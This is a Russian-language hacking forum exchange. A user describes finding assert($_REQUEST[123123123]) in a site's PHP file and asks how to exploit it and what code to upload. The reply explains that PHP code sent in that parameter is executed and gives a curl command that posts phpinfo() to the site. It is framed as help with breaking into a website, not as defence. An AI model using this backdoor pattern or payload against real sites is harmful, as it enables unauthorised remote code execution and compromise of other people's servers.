25.04.2016, 15:17
|
|
Guest
Сообщений: n/a
Провел на форуме:
300820
Репутация:
90
|
|
Сообщение от marynli
marynli said:
↑
Допустим в php файле на сайте есть строка вида:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]assert[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]123123123[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]
Как можно раскрутить это? С PHP плохо знаком, но шестое чувство подсказывает что он получает запрос на переменную 123123123 и выполняет PHP код (assert).
Как можно написать PHP скрипт чтобы использовать данную уязвимость ?
Какой код лучше заливать? в параметр 123123123 пишешь пхп код, он выполняется
curl ' http://site.ru/' --data '123123123=phpinfo();'
|
|
|
|